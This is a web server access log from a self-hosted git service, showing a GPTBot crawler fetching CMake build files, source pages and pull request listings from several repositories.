[Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11590] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24273] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15267] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:21:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2fubuntu%20%ec%84%9c%eb%b2%84%20%ea%b8%b0%eb%b3%b8%eb%aa%85%eb%a0%b9%ec%96%b4.md" [Client 74.7.227.38] [Length 21213] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:18:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11188] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:18:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11410] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11218] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11218] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9927] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13731] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13728] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 20106] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" 